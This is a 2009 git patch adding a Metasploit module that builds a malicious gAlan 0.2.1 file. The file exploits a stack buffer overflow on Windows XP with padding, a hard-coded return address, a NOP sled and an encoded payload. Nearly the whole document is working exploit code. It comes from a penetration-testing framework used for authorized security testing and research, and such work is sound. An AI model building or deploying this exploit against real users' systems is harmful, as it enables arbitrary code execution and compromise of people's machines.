From e724ceaf33016ced22f8be93e7a6cef49bbb5266 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 10 Dec 2009 20:41:40 +0000 Subject: [PATCH] add exploit for gAlan from loneferret git-svn-id: file:///home/svn/framework3/trunk@7812 4d416f70-5f16-0410-b530-b9f4589650da --- .../fileformat/galan_fileformat_bof.rb | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 modules/exploits/windows/fileformat/galan_fileformat_bof.rb diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb new file mode 100644 index 0000000000..d8743cfa0c --- /dev/null +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -0,0 +1,66 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'gAlan 0.2.1 Buffer Overflow Exploit', + 'Description' => %q{ + This module exploits a stack overflow in gAlan 0.2.1 + By creating a specially crafted galan file, an an attacker may be able + to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeremy Brown <0xjbrown41 [at] gmail.com>', + 'loneferret', + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://www.exploit-db.com/exploits/10339' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ], # 0x100175D0 call esi @ glib-1_3 + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 07 2009', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'evil.galan']), + ], self.class) + end + + + def exploit + + sploit = "Mjik" + sploit << rand_text_alpha_upper(1028) + sploit << [target.ret].pack('V') + sploit << "\x90" * 45 + sploit << payload.encoded + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(sploit) + + end + +end